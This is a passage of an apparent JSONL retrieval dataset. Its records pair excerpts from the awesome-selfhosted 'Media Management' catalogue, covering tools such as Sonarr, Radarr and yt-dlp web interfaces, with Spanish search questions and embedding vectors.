0.06505, -0.01377, 0.00348, 0.02198, 0.02219, -0.04921, -0.05949, -0.02036, -0.09328, -0.0466, -0.01316, -0.06841, -0.05826, -0.01796, 0.01104, -0.17198, -0.00881, 0.05727, 0.02151, 0.01793, 0.10633, -0.04385, 0.02417, -0.03626, 0.03161, 0.03024, 0.0256, -0.02128, 0.1004, 0.02011, 0.04807, 0.12933, -0.02156, -0.09468, 0.00821, 0.01187, -0.00615, -0.04575, 0.03701, -0.02672, 0.01916, -0.08547, -0.02673, 0.05521, 0.04712, -3e-05, 0.09381, -0.01225, -0.04213, -0.01688, -0.01387, -0.09494, -0.08002, -0.11553, 0.09125, -0.02074, -0.01927, 0.01691, -0.02591, -0.01558, -0.03338, -0.0888, -0.0262, 0.02147, 0.04965, 0.02984, 0.03047, 0.0877, -0.01854, -0.06613, 0.04044, -0.00093, -0.04719, -0.00737, 0.0648, 0.04681, -0.0532, -0.04665, -0.01474, -0.01074, 0.01176, 0.06392, -0.10021, 0.07144, -0.00286, 0.03295, 0.02451, 0.03524, 0.02734, -0.03054, -0.10946, -0.02464, -0.04924, 0.04084, -0.0342, -0.00194, 0.04741, 0.0058, 0.02693, -0.04442, -0.01313, -0.00242, 0.01454, 0.02614, 0.06782, -0.00895, -0.02805, 0.01408, -0.01524, -0.02909, 0.02579, -0.00549, 0.09681, -0.01838, -0.04306, -0.01558, 0.03751, 0.08428, 0.01594, -0.02472, -0.0461, -0.05063, -0.03618, 0.10453, -0.03489, -0.09079, 0.00118, 0.06241, 0.04682, -0.05264, 0.03522, -0.05881]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: MKVPriority β€” Selects preferred audio and subtitle tracks using configurable priority scores and sets the appropriate default and forced flags [MIT, Python/Docker]. MyTube β€” Downloader and player for yt-dlp-supported sites with channel subscriptions, cloud upload support, and local library organization [⚠, MIT, Nodejs/Docker]. nefarious β€” Automate downloading Movies and TV Shows [GPL-3.0, Python]. Ombi β€” Content request system for Plex/Emby, connects to SickRage, CouchPotato, Sonarr, with a growing feature set [GPL-2.0, C#/deb]. Pinchflat β€” Download YouTube content built using yt-dlp [⚠, AGPL-3.0, Docker]. PodFetch β€” Sleek and efficient podcast downloader [Apache-2.0, Docker/Rust]. Radarr β€” Automatically download movies via Usenet and BitTorrent (fork of Sonarr) [GPL-3.0, C#/Docker]. Reaparr β€” Cross-platform Plex media downloader that seamlessly adds media from other Plex servers to your own [⚠, GPL-3.0, Docker].", "indexar": "que programa hay para descargar pelΓ­culas y series de forma automΓ‘tica?", "v": [-0.01995, 0.06525, -0.03557, -0.18793, -0.02668, -0.07567, -0.00636, -0.03121, -0.07545, -0.02827, 0.01592, -0.09443, -0.03901, -0.11241, 0.01736, 0.00014, -0.00132, -0.11498, 0.06644, 0.05836, 0.06599, -0.02415, -0.01739, -0.10511, -0.00671, 0.04535, 0.04932, 0.03284, -0.15743, -0.02713, 0.10029, 0.07867, 0.10819, -0.1179, -0.05854, 0.00604, 0.00459, 0.02238, 0.02203, 0.01969, 0.04176, 0.02765, -0.03391, 0.1034, 0.0472, 0.00697, 0.0927, 0.04163, 0.02779, -0.11033, 0.04075, 0.05564, 0.04581, -0.03292, 0.05706, -0.22275, 0.02567, -0.05712, -0.05551, -0.0072, 0.03769, 0.06932, -0.05293, -0.01904, -0.05174, 0.02473, 0.11684, -0.0123, -0.06886, -0.08576, -0.02453, -0.04931, 0.00932, 0.02055, 0.04814, 0.04331, -0.08535, -0.09987, 0.01607, -0.07592, 0.02746, -0.11049, 0.09058, 0.03956, -0.06532, -0.08274, -0.01612, 0.00142, -0.01249, -0.0739, 0.02265, 0.00959, 0.05454, 0.11308, 0.09441, -0.07354, 0.10395, 0.05184, 0.08616, 0.14521, -0.02203, -0.10592, 0.00073, 0.1415, -0.06887, 0.07774, 0.04617, -0.0192, -0.05229, 0.02086, -0.05326, 0.04571, 0.02585, -0.12045, -0.03016, -0.01187, 0.05879, -0.00087, -0.00455, -0.00044, -0.11705, 0.06108, -0.07828, -0.07283, 0.10542, -0.04306, -0.03427, 0.04139, -0.06455, 0.02315, 0.016, -0.04345, -0.12858, -0.07992, -0.02446, -0.11455, 0.03273, 0.04085, -0.0387, -0.14987, 0.06869, 0.07565, 0.03994, 0.04944, 0.03687, -0.06622, 0.01498, -0.09194, 0.03335, 0.01896, 0.02325, 0.07053, 0.06307, 0.01885, -0.00653, 0.06044, 0.07862, -0.06381, 0.05751, 0.06012, 0.07101, -0.04891, -0.03893, -0.08092, -0.01543, 0.00653, -0.08636, 0.01725, 0.06606, 0.07479, 0.02671, 0.0313, 0.00583, -0.08141, -0.0512, -0.03417, -0.02208, -0.06873, 0.03302, -0.03819, -0.10279, 0.04255, 0.03109, -0.00456, -0.06379, -0.08247, -0.04741, -0.01745, 0.07167, 0.0157, 0.00565, 0.08305, -0.06043, -0.0246, -0.007, -0.05204, -0.09573, 0.05935, 0.08387, -0.04015, -0.12117, -0.06185, -0.01323, 0.02304, 0.04226, 0.09652, 0.00398, 0.06164, -0.00397, 0.08407, -0.01947, 0.00063, 0.04783, -0.01713, -0.04992, -0.04183, -0.02034, 0.05726, 0.02232, 0.03927, -0.01848, -0.02466, 0.05946, 0.02511, -0.03591, -0.05289, 0.0628, 0.06196, 0.01691, -0.04202, -0.08688, 0.05484, 0.00649, -0.09374, 0.05309, 0.03927, 0.00977, -0.02168, -0.03693, -0.06497, 0.00018, 0.1008, 0.01788, -0.04482, -0.0781, -0.02405, -0.02483, 0.04567, 0.05804, -0.0259, -0.07273, 0.10454, -0.01632, -0.00754, 0.02158, 0.02422]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: MKVPriority β€” Selects preferred audio and subtitle tracks using configurable priority scores and sets the appropriate default and forced flags [MIT, Python/Docker]. MyTube β€” Downloader and player for yt-dlp-supported sites with channel subscriptions, cloud upload support, and local library organization [⚠, MIT, Nodejs/Docker]. nefarious β€” Automate downloading Movies and TV Shows [GPL-3.0, Python]. Ombi β€” Content request system for Plex/Emby, connects to SickRage, CouchPotato, Sonarr, with a growing feature set [GPL-2.0, C#/deb]. Pinchflat β€” Download YouTube content built using yt-dlp [⚠, AGPL-3.0, Docker]. PodFetch β€” Sleek and efficient podcast downloader [Apache-2.0, Docker/Rust]. Radarr β€” Automatically download movies via Usenet and BitTorrent (fork of Sonarr) [GPL-3.0, C#/Docker]. Reaparr β€” Cross-platform Plex media downloader that seamlessly adds media from other Plex servers to your own [⚠, GPL-3.0, Docker].", "indexar": "cual es una alternativa libre a Sonarr o Radarr?", "v": [-0.12856, -0.01162, -0.06806, 0.06552, -0.04998, -0.00511, 0.09761, -0.06689, -0.06081, 0.00346, -0.1097, -0.32428, 0.18516, -0.12942, 0.16464, 0.06134, -0.04642, 0.06193, 0.08841, -0.0329, -0.06482, -0.00381, 0.02734, -0.01635, -0.03594, -0.06344, 0.06262, 0.00203, 0.0451, 0.01432, 0.07424, 0.00359, 0.04667, 0.03706, -0.17209, 0.04409, 0.21558, 0.08579, 0.01526, -0.05701, -0.09114, 0.03366, 0.0825, 0.0293, 0.01772, 0.04036, -0.07908, 0.10018, 0.03929, 0.1097, -0.0354, -0.01814, -0.06164, 0.03265, 0.09781, -0.09629, 0.04406, -0.09953, -0.10875, -0.05838, -0.05192, 0.07984, 0.05879, -0.01909, -0.00324, -0.03152, -0.04308, -0.01399, -0.06453, -0.04123, 0.0802, 0.03324, -0.04567, -0.01554, -0.09107, -0.0222, -0.08463, -0.0726, -0.01428, 0.03581, 0.10767, -0.06051, 0.02802, 0.04394, -0.02939, -0.05731, 0.16921, -0.1586, 0.00261, 0.04596, -0.01796, 0.03585, 0.02233, 0.09262, 0.00379, -0.10612, 0.10142, 0.02894, 0.0244, -0.03605, 0.1161, -0.00907, -0.08278, -0.00151, 0.01472, 0.03943, -0.05301, 0.0407, -0.03542, 0.01251, -0.04451, 0.05886, 0.0079, 0.00579, 0.038, -0.09938, -0.11639, -0.0034, -0.01392, 0.01799, 0.01393, -0.06864, 0.00719, -0.12838, 0.0426, 0.06435, -0.00815, 0.03004, -0.07183, 0.05186, 0.0249, 0.01579, -0.0202, -0.14066, -0.15442, -0.03643, 0.06054, -0.00126, 0.02259, 0.02665, -0.02512, 0.04724, 0.00318, -0.02036, 0.02925, -0.02234, 0.04665, -0.0233, 0.02332, -0.04194, -0.05972, 0.06094, 0.05113, 0.07869, -0.0124, 0.04632, -0.01374, -0.00689, -0.01135, 0.10856, -0.0416, 0.00985, -0.04442, 0.02971, -0.00782, -0.02273, -0.01412, -0.02053, -0.07586, -0.00626, 0.00404, 0.06466, 0.01356, -0.05512, 0.04119, -0.03558, 0.0517, -0.04536, 0.03664, -0.03319, 0.04196, 0.00853, -0.09733, 0.07179, -0.02994, -0.02431, -0.02375, -0.02864, 0.02613, -0.01115, -0.08405, 0.02108, -0.08679, -0.08509, -0.06612, 0.02182, 0.05661, -0.09591, 0.0033, 0.00355, 0.02182, -0.06325, -0.01531, -0.04846, -0.01333, -0.02155, -0.01742, 0.04116, 0.03449, 0.02166, 0.0016, 0.00516, 0.05838, 0.02459, -0.03388, 0.01824, 0.02963, -0.02958, -0.04447, -0.02885, 0.06507, 0.05891, 0.04542, 0.00537, -0.04085, 0.03648, 0.01532, 0.03214, 0.01015, -0.00912, -0.01382, -0.00656, 0.04225, 0.0091, 0.00361, 0.02614, -0.01416, 0.03452, -0.01542, -0.04627, 0.07178, 0.04291, -0.05243, -0.0023, -0.00886, -0.02409, -0.11951, -0.01817, -0.04474, -0.07307, -0.02854, 0.04319, -0.01167, -0.05853, 0.02305, -0.00153]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: MKVPriority β€” Selects preferred audio and subtitle tracks using configurable priority scores and sets the appropriate default and forced flags [MIT, Python/Docker]. MyTube β€” Downloader and player for yt-dlp-supported sites with channel subscriptions, cloud upload support, and local library organization [⚠, MIT, Nodejs/Docker]. nefarious β€” Automate downloading Movies and TV Shows [GPL-3.0, Python]. Ombi β€” Content request system for Plex/Emby, connects to SickRage, CouchPotato, Sonarr, with a growing feature set [GPL-2.0, C#/deb]. Pinchflat β€” Download YouTube content built using yt-dlp [⚠, AGPL-3.0, Docker]. PodFetch β€” Sleek and efficient podcast downloader [Apache-2.0, Docker/Rust]. Radarr β€” Automatically download movies via Usenet and BitTorrent (fork of Sonarr) [GPL-3.0, C#/Docker]. Reaparr β€” Cross-platform Plex media downloader that seamlessly adds media from other Plex servers to your own [⚠, GPL-3.0, Docker].", "indexar": "con que puedo montar un sistema para gestionar mi biblioteca de audio y subtΓ­tulos?", "v": [0.13424, 0.10697, -0.11497, -0.19727, -0.06873, -0.06054, -0.14853, 0.00611, -0.13903, -0.11801, -0.07491, -0.04294, 0.07439, 0.04681, 0.04549, -0.00708, 0.07298, -0.14027, 0.01361, -0.01, 0.10055, 0.01563, -0.00611, 0.03969, 0.00582, 0.0148, 0.09371, -0.04952, -0.08809, 0.08799, 0.00195, 0.07524, 0.06258, -0.11823, -0.08832, -0.00382, 0.03227, 0.08029, -0.01128, -0.01506, -0.02908, 0.03519, -0.00405, 0.05493, 0.01199, -0.05888, 0.10627, -0.05502, -0.02582, 0.04037, -0.004, -0.03548, -0.07271, -0.00554, 0.03144, -0.12577, 0.05558, -0.09182, 0.03396, -0.10727, -0.01275, 0.07479, 0.00065, -0.02193, 0.15377, -0.00309, 0.04041, -0.00234, -0.10484, 0.09597, -0.09831, -0.03106, 0.05129, 0.06649, -0.04174, 0.06113, 0.01039, -0.08265, 0.11855, 0.01259, -0.02594, -0.0151, 0.02265, 0.05383, -0.01168, 0.0158, 0.02708, -0.08559, 0.03347, 0.01036, -0.06006, -0.0585, -0.01149, -0.09928, 0.06144, -0.08701, 0.05254, 0.01357, -0.05876, -0.04095, -0.03857, 0.10228, -0.0229, 0.17479, -0.00212, -0.02681, -0.01452, -0.12781, 0.15114, -0.11403, -0.02424, 0.04245, 0.0368, -0.02534, -0.07689, -0.05432, 0.08026, 0.06768, 0.12595, 0.11531, -0.10395, 0.01069, -0.04732, -0.06916, 0.0824, -0.01174, 0.16991, 0.02362, 0.07671, 0.04872, 0.006, -0.01115, -0.02261, -0.07248, -0.05832, 0.00658, -0.06411, -0.02183, -0.04698, -0.0603, -0.06102, 0.01174, -0.03312, -0.05758, 0.03752, -0.08394, 0.07774, -0.03642, 0.06713, -0.1031, 0.0218, 0.0453, 0.01357, -0.03612, -0.02856, 0.05531, 0.11751, -0.0576, 0.00077, -0.01026, 0.03867, 0.01184, 0.03109, -0.03286, -0.09048, -0.00736, -0.04515, -0.04787, 0.04095, -0.05881, -0.08361, 0.00136, 0.04687, -0.02241, 0.00209, -0.05595, -0.0153, -0.05468, 0.08908, 0.06648, -0.04841, -0.00258, 0.03164, -0.00796, -0.10097, -0.05658, -0.01171, -0.05815, -0.1133, -0.0385, 0.04515, 0.02402, 0.01035, 0.01515, 0.03923, -0.03174, -0.07578, 0.02866, -0.06758, 0.01306, -0.03331, 0.03569, 0.03107, -0.00956, 0.05383, -0.00809, 0.03091, 0.10156, 0.07013, 0.02274, 0.01039, 0.02808, 0.00748, -0.00477, -0.09677, 0.00677, -0.06074, 0.06708, -0.02668, -0.09533, 0.02671, 0.03519, 0.11768, 0.04929, 0.00879, -0.05758, 0.01153, 0.00946, -0.00804, -0.01222, -0.04204, -0.04706, 0.01311, 0.03241, 0.01412, -0.06273, 0.02835, 0.04271, -0.04823, -0.00832, 0.00012, 0.09519, -0.02362, -0.0356, -0.03356, -0.05536, -0.05651, 0.03743, 0.00749, -0.0526, -0.0072, 0.03321, -0.02737, -0.0303, 0.0127, -0.06004]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Seerr β€” Manage requests for your media library, supports Plex, Jellyfin and Emby media servers (fork of Overseerr) [MIT, Docker/Nodejs]. Sonarr β€” Automatic TV Shows downloader and manager for Usenet and BitTorrent. It can grab, sort and rename new episodes and automatically upgrade the quality of files already downloaded when a better quality format becomes available [GPL-3.0, C#/Docker]. TrackWatch β€” Automated music release tracker for Spotify with email notifications, discography generator, and ghost track cleaner (alternative to Release Radar) [⚠, MIT, Docker]. tubesync β€” Syncs YouTube channels and playlists to a locally hosted media server [⚠, AGPL-3.0, Docker/Python]. Watcharr β€” Add and track all the shows and movies you are watching. Comes with user authentication, modern and clean UI and a very simple setup [MIT, Docker]. ydl_api_ng β€” Simple youtube-dl REST API to launch downloads on a distant server [GPL-3.0, Python].", "indexar": "que programa me ayuda a organizar mi biblioteca de video desde casa?", "v": [0.03008, 0.13174, -0.0721, -0.15367, -0.04823, -0.08773, -0.05622, 0.03274, -0.08074, -0.18922, -0.10428, -0.13964, 0.05038, -0.05897, -0.01242, -0.07073, 0.13275, -0.05234, 0.11983, -6e-05, 0.05157, 0.14662, -0.03301, 0.15018, 0.01568, -0.07151, 0.15876, 0.02305, -0.06243, 0.03905, -0.00329, -0.0276, -0.00418, -0.05509, 0.02875, 0.0259, 0.08525, -0.03128, -0.0631, -0.01998, -0.10545, 0.08042, 0.0525, 0.03198, 0.029, -0.05009, 0.1386, 0.00199, -0.05216, 0.01344, -0.10495, -0.06578, 0.03501, 0.04801, 0.02205, -0.12006, -0.05628, -0.20482, -0.0451, -0.05776, -0.03824, -0.04952, 0.04065, 0.00098, 0.13245, 0.07674, -0.00598, 0.04884, -0.03393, 0.05825, -0.1526, 0.01141, 0.01974, -0.02363, -0.1641, 0.04235, -0.00349, -0.07145, 0.04226, -0.04633, -0.01685, -0.00628, 0.02439, 0.07302, -0.0098, -0.01881, -0.02303, 0.00436, 0.08814, -0.09921, -0.07394, 0.02843, -0.01513, 0.02748, 0.08942, -0.09451, 0.15242, 0.04872, 0.08711, 0.00512, 0.00207, -0.10988, -0.02656, 0.09725, 0.0088, 0.00619, 0.02598, 0.02473, -0.124, -0.06688, 0.05717, 0.06983, 0.01513, -0.03104, -0.06514, -0.00042, 0.03783, -0.01028, 0.0977, -0.00022, -0.11687, 0.01104, -0.06149, -0.02241, 0.00836, -0.01733, 0.13179, 0.04909, -0.01002, 0.07318, 0.01376, -0.03328, -0.0457, -0.02316, 0.00944, -0.00323, -0.07427, -0.13035, -0.03636, -0.06631, 0.04729, 0.01774, 0.00207, -0.0651, 0.0091, -0.11086, 0.05009, 0.02755, -0.06224, 0.03895, -0.00546, 0.01347, 0.03592, -0.02947, 0.02069, 0.06329, 0.05319, -0.05213, -0.07339, -0.05562, -0.04026, 0.03417, 0.01273, -0.153, -0.07175, 0.01702, 0.05858, 0.04918, 0.00421, 0.0443, -0.08157, 0.01516, -0.01228, -0.02636, -0.10006, -0.08681, 0.03654, -0.04802, -0.00897, 0.03146, -0.07836, 0.06089, 0.03475, -0.00282, -0.04339, -0.0602, 0.01866, 0.00097, -0.05416, -0.0753, -0.04754, -0.01579, -0.02484, -0.02323, -0.02725, -0.04658, -0.11655, -0.01109, 0.09637, -0.00924, -0.01386, -0.05277, 0.03821, 0.08872, 0.01984, 0.0314, -0.04104, 0.01137, 0.03617, 0.03418, 0.00707, 0.02063, 0.04387, 0.03985, -0.04823, -0.01821, -0.0438, 0.07539, 0.03121, -0.01717, 0.0595, 0.01076, 0.0193, -0.03709, 0.01749, -0.04624, 0.04627, 0.00266, 0.00553, 0.02888, -0.03815, -0.12249, 0.06686, 0.00294, 0.03392, -0.0488, 0.00692, -0.0079, -0.00371, -0.02344, -0.0331, 0.07735, -0.00506, -0.01356, -0.0168, -0.02709, -0.06124, 0.04315, 0.00165, 0.00536, 0.02438, 0.0148, 0.05166, -0.03743, 0.01702, 0.01425]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Seerr β€” Manage requests for your media library, supports Plex, Jellyfin and Emby media servers (fork of Overseerr) [MIT, Docker/Nodejs]. Sonarr β€” Automatic TV Shows downloader and manager for Usenet and BitTorrent. It can grab, sort and rename new episodes and automatically upgrade the quality of files already downloaded when a better quality format becomes available [GPL-3.0, C#/Docker]. TrackWatch β€” Automated music release tracker for Spotify with email notifications, discography generator, and ghost track cleaner (alternative to Release Radar) [⚠, MIT, Docker]. tubesync β€” Syncs YouTube channels and playlists to a locally hosted media server [⚠, AGPL-3.0, Docker/Python]. Watcharr β€” Add and track all the shows and movies you are watching. Comes with user authentication, modern and clean UI and a very simple setup [MIT, Docker]. ydl_api_ng β€” Simple youtube-dl REST API to launch downloads on a distant server [GPL-3.0, Python].", "indexar": "con que puedo gestionar automΓ‘ticamente las descargas de series para que se ordenen solas?", "v": [0.1462, 0.13547, -0.08725, -0.06907, -0.03247, -0.01628, 0.01256, -0.03296, -0.10055, 0.0199, -0.18358, -0.14215, 0.06964, -0.12804, 0.06421, 0.02396, 0.07812, -0.06526, -0.06736, 0.0596, 0.03619, -0.06412, 0.0492, -0.12583, -0.01746, -0.01246, 0.16329, 0.02364, -0.19245, -0.02099, -0.01366, 0.01644, 0.1445, -0.09555, -0.01763, 0.02828, -0.10115, 0.1405, 0.00055, -0.02242, -0.06751, 0.09474, -0.0939, 0.04793, 0.08314, -0.01266, 0.1038, 0.04212, 0.01208, -0.15073, -0.04714, -0.04543, -0.0222, -0.06832, -0.05817, -0.14911, 0.07922, -0.05461, 0.01921, 0.05124, -0.04351, 0.06145, 0.04748, 0.04708, 0.08711, 0.0526, 0.08581, 0.08821, -0.05405, 0.03115, -0.05534, -0.00876, -0.00019, 0.05393, 0.04808, -0.03304, -0.01663, -0.09175, 0.04468, 0.05166, 0.03132, -0.03529, -0.00785, 0.03012, 0.0176, -0.03914, -0.10474, -0.07806, -0.04272, 0.00421, -0.00682, -0.13307, -0.00513, -0.03813, 0.08799, 0.0126, 0.01197, -0.00116, 0.06058, 0.09766, -0.05912, 0.00643, 0.01733, 0.11835, -0.00831, 0.03562, 0.02651, -0.03311, 0.01696, -0.04504, -0.05643, 0.00818, 0.06227, -0.05897, -0.08682, 0.01671, 0.00228, 0.01137, -0.0128, 0.02794, -0.05619, -0.15636, 0.07218, 0.03543, 0.11594, -0.03545, 0.01408, 0.05888, 0.05157, -0.0467, -0.04016, -0.06209, -0.0614, -0.03661, -0.04956, -0.0774, -0.05664, 0.00468, -0.07863, -0.10158, -0.00368, 0.11561, 0.01667, 0.01403, 0.09457, -0.08644, -0.02304, -0.15315, -0.02069, -0.04316, 0.12563, -0.02282, 0.08285, 0.05119, 0.0261, 0.08077, -0.00012, -0.06875, 0.07804, 0.00842, -0.00787, 0.00986, -0.04222, 0.01954, -0.0293, -0.00761, -0.0061, 0.00715, -0.00313, 0.01037, -0.05378, -0.01226, -0.05801, -0.03484, 0.00132, -0.05906, -0.05565, -0.08749, 0.06845, 0.04404, -0.05465, -0.0426, 0.02431, -0.01864, -0.04628, -0.03711, -0.07399, 0.03349, 0.05207, 0.05585, 0.02347, 0.07669, -0.05849, -0.01202, 0.00951, -0.01288, 0.00867, 0.06066, -0.06404, -0.05207, -0.06328, 0.00407, 0.05467, 0.08066, 0.05626, 0.00206, -0.00413, 0.12183, 0.04534, 0.02857, -0.02828, 0.07796, 0.05239, -0.04032, -0.07736, -0.00512, -0.02944, -0.05068, -0.0054, -0.03101, -0.02867, 0.02619, 0.12085, 0.01748, -0.04542, 0.0441, -0.01198, 0.03886, 0.0667, 0.01836, -0.06307, 0.03201, -0.02068, 0.0139, 0.02574, -0.00209, 0.03742, 0.01166, 0.00114, 0.01303, -0.01427, 0.08774, 0.04379, -0.04604, -0.09289, -0.07213, -0.04818, 0.07587, -0.03162, -0.00482, -0.02229, 0.05309, -0.03406, 0.01227, -0.00167, -0.0156]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Seerr β€” Manage requests for your media library, supports Plex, Jellyfin and Emby media servers (fork of Overseerr) [MIT, Docker/Nodejs]. Sonarr β€” Automatic TV Shows downloader and manager for Usenet and BitTorrent. It can grab, sort and rename new episodes and automatically upgrade the quality of files already downloaded when a better quality format becomes available [GPL-3.0, C#/Docker]. TrackWatch β€” Automated music release tracker for Spotify with email notifications, discography generator, and ghost track cleaner (alternative to Release Radar) [⚠, MIT, Docker]. tubesync β€” Syncs YouTube channels and playlists to a locally hosted media server [⚠, AGPL-3.0, Docker/Python]. Watcharr β€” Add and track all the shows and movies you are watching. Comes with user authentication, modern and clean UI and a very simple setup [MIT, Docker]. ydl_api_ng β€” Simple youtube-dl REST API to launch downloads on a distant server [GPL-3.0, Python].", "indexar": "cual es una alternativa libre para rastrear nuevos lanzamientos de mΓΊsica en Spotify?", "v": [0.07329, 0.00693, -0.14148, -0.06453, -0.07115, -0.14317, -0.13214, -0.23521, -0.07252, -0.0264, -0.02683, -0.17089, 0.04545, -0.02296, 0.0375, -0.05724, 0.05655, 0.00856, 0.02993, -0.00214, -0.05572, -0.02601, -0.11038, -0.10293, 0.05164, -0.05954, 0.1157, 0.07337, -0.17467, 0.05041, -0.0228, -0.00953, -0.00157, -0.00585, -0.11054, -0.03071, 0.12522, 0.05805, 0.01378, -0.07547, 0.05714, -0.1354, 0.01583, 0.05282, -0.04598, -0.07142, -0.00083, 0.06246, 0.07655, 0.07228, 0.08306, 0.14736, -0.07322, 0.08396, 0.0856, -0.07429, 0.03684, -0.16792, -0.09176, -0.08939, -0.09113, 0.0045, -0.02938, -0.0439, -0.0448, 0.05586, 0.00345, 0.02142, -0.02943, 0.13293, 0.05547, -0.02564, 0.07223, 0.03951, 0.00931, 0.1259, -0.0589, -0.14137, -0.01512, -0.00892, 0.04493, -0.12923, 0.03944, 0.04547, -0.07241, -0.0003, 0.1307, -0.02836, -0.05082, 0.06607, -0.0809, 0.0139, -0.05018, 0.16646, 0.03318, 0.02928, 0.07604, -0.02461, 0.03856, -0.00648, 0.01613, 0.00702, -0.05805, 0.00357, -0.02595, 0.01267, -0.0247, -0.08028, 0.0563, 0.1146, -0.08364, 0.02658, -0.04332, -0.0111, -0.03817, -0.02849, -0.04412, -0.01553, 0.01578, 0.01856, -0.0296, -0.02857, -0.04335, -0.07004, -0.02718, 0.00101, -0.03609, 0.04836, 0.00902, -0.02634, 0.10593, -0.0709, 0.00048, -0.02673, -0.05668, -0.05042, 0.03452, -0.03865, 0.03477, 0.07183, 0.09278, 0.04459, 0.01379, -0.00022, 0.05822, -0.05939, 0.06287, -0.00845, 0.01002, -0.02333, -0.08881, 0.1404, -0.1212, -0.01904, 0.00872, 0.03987, 0.0001, -0.04492, -0.04158, 0.00183, 0.00844, 0.02531, -0.1124, -0.00481, 0.006, 0.04609, 0.08055, 0.00621, -0.00788, 0.02053, -0.07289, 0.03288, 0.09027, -0.0209, -0.04572, -0.09264, 0.00123, -0.09026, 0.1233, 0.00612, -0.06596, 0.03117, -0.11456, -0.05243, -0.00889, -0.067, -0.0513, -0.04599, -0.05502, 0.02469, -0.04292, -0.01031, -0.01696, -0.03546, 0.03364, -0.00677, -0.02001, -0.04915, -0.1264, 0.04727, -0.05218, -0.0842, -0.07329, -0.04615, 0.02136, -0.01606, -0.03182, 0.05626, 0.03085, -0.03657, 0.03633, -0.0111, 0.02572, 0.04614, -0.06436, -0.03501, 0.01319, -0.03982, 0.01641, 0.04664, -0.02763, 0.05824, 0.04227, -0.01289, -0.04482, 0.05375, 0.03024, -0.02366, 0.0343, 0.02201, 0.00394, 0.02437, 0.01804, -0.01605, 0.01109, 0.02675, -0.03591, 0.006, -0.04884, -0.02476, 0.02177, 0.03664, -0.02777, -0.00564, -0.01096, -0.04619, -0.03168, 0.0201, -0.01576, -0.04273, -0.0159, 0.06764, 0.06783, 0.00464, 0.05811, 0.01058]} +{"tipo": "pregunta", "herramienta": "Media Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Management", "tema": "media management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Management: Youtarr β€” Download videos from YouTube channels on a schedule via yt-dlp, with a web UI to browse and selectively download videos. Integrates with Plex Media Server and generates NFO metadata for Jellyfin, Kodi, and Emby [⚠, ISC, Docker]. youtube-dl-nas β€” Authenticated yt-dlp download queue for video, audio and subtitles, with history, mobile sharing and NAS file management (fork of youtube-dl-server) [⚠, MIT, Python/Docker]. YoutubeDL-Server β€” Web and REST interface to Youtube-DL for downloading videos onto a server [MIT, Python/Docker]. yt-dlp Web UI β€” Web GUI for yt-dlp [MPL-2.0, Docker/Go/Nodejs].", "indexar": "que programa sirve para descargar videos de YouTube automΓ‘ticamente?", "v": [0.03603, 0.09061, -0.10011, -0.15041, 0.03843, -0.02028, -0.03792, -0.06302, 0.05711, -0.11238, -0.07086, -0.18584, 0.00744, -0.05693, -0.12816, -0.05048, 0.11354, -0.10415, 0.14194, -0.02108, 0.15044, 0.00645, -0.04006, -0.13378, -0.03879, 0.01725, -0.03126, 0.00355, -0.08536, -0.06921, 0.01328, 0.07865, -0.05094, -0.01401, -0.10242, 0.00834, 0.08973, 0.03861, -0.07254, 0.05405, 0.01465, 0.00957, -0.11022, 0.10661, -0.01632, 0.03441, 0.1326, -0.03817, -0.03437, -0.07542, 0.08196, 0.07849, -0.05248, -0.00174, -0.04094, -0.06088, 0.0413, -0.18461, -0.09639, -0.01163, 0.00117, -0.08513, 0.07973, 0.01027, 0.01937, 0.08492, 0.08271, 0.12486, -0.0347, 0.03701, -0.07289, 0.02328, 0.02264, 0.00581, 0.03512, 0.10712, -0.05079, -0.01315, -0.0571, -0.00284, 0.02663, -0.10827, 0.02258, 0.03983, -0.05191, -0.07192, 0.00219, -0.03869, 0.01674, -0.1757, -0.01548, 0.10489, 0.08183, 0.07051, 0.02254, -0.05737, 0.10956, -0.01244, 0.05189, -0.02968, 0.00927, -0.10577, 0.01283, 0.09838, 0.01281, 0.13578, 0.06673, -0.09103, -0.08388, 0.0571, 0.04345, 0.03222, -0.05116, -0.08426, -0.04346, 0.03109, -0.0373, -0.02882, 0.0306, 0.00184, -0.00139, 0.00673, -0.10935, -0.04902, 0.02584, 0.00591, -0.03294, 0.07669, -0.02682, 0.05823, 0.05756, -0.05321, -0.0408, 0.00956, 0.013, -0.08007, 0.07857, -0.0061, -0.12367, -0.07758, 0.08736, 0.0297, 0.01365, -0.03008, 0.08338, -0.07127, 0.0498, -0.12101, -0.03114, 0.04416, 0.01042, 0.02008, -0.05281, -0.06579, -0.01887, -0.01214, 0.00595, -0.07065, -0.07767, 0.00166, 0.06336, -0.05836, -0.00551, -0.06579, -0.05138, 0.05761, -0.02551, 0.05517, 0.01178, 0.07416, 0.00448, 0.0834, 0.01332, -0.09223, -0.0774, -0.03102, 0.03351, -0.03844, 